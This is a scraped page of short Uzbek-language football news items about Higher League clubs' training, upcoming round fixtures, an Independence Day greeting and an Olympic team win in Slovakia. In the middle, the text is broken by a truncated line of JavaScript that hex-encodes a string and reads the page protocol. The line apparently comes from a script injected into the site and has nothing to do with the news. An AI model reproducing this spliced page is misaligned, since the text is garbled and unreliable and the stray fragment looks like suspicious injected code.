Тошкентда терма-жамоаларнининг ўқув-йиғин ўтказиш баъзасида ОФКнинг футбол мураббийлари учун ўқув-семинар курслари ўтказилмоқда.
Бугун “Бунёдкор” футбол мактаби майдонида асосий ва ёшлар таркибларимиз ўзаро назорат учрашувида майдонга тушишди.
Олий лигада кичик танаффус юз бергани боис “Андижон” айни пайтда ўз қароргоҳида тайёргарликни давом эттирмоқда. Жамоамиз 21-турда ўз майдонида “Қизилқум”ни қабул қилади.
Кеча клуб базасида тўпланган “Насаф” футболчилари олий лиганинг 21-туридан ўрин олган “Шўртан”га қарши кечадиган учрашувга тайёргарликни давом эттирмоқда.
20-турда “Бухоро” ўз майдонида “Андижон”ни мағлубитга учратганидан сўнг, жамоага уч кунлик кичкина таътил эълон қилинган эди.
Тошкентда кичик йиғин ўтказиб қайтгач, футболчиларга икки кун дам берилди. Бугун эса “Машъал”га қарши кечадиган ўйинга тайёргарлик бошланади.
// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e
26 август куни “Навбаҳор”га қарши Наманганда кечган ўйиндан кейин “Бунёдкор” футболчилари қисқа таътилга чиқишган эди.
Ўзбекистон терма жамоасининг ЖЧ-2018 мусобақаси саралаш ўйинларига тайёргарлик кўриши муносабати билан олий лигада кичик танаффус юзага келганидан хабарингиз бор.
Азиз юртдошлар! Бугун Ватанимиз мустақилликка эришган куннинг 24 йиллик байрами катта шодду хуррамлик билан нишонланмоқда.
"Металлург" футбол клуби раҳбарияти, барча ўйинчилари мамлакатимиз аҳлиниэнг улуғ ва энг азиз байрамимиз– мамлакатимизмустақиллигининг 24 йиллик байрами муносабати билан самимий муборакбод этади!
Август ойининг сўнгги санасида Словакияда йиғинни бошлаган Ўзбекистон олимпия терма жамоаси турнир доирасидаги дастлабки учрашувини БАА футболчиларига қарши ўтказиб, кичик ҳисобда зафар қучишди.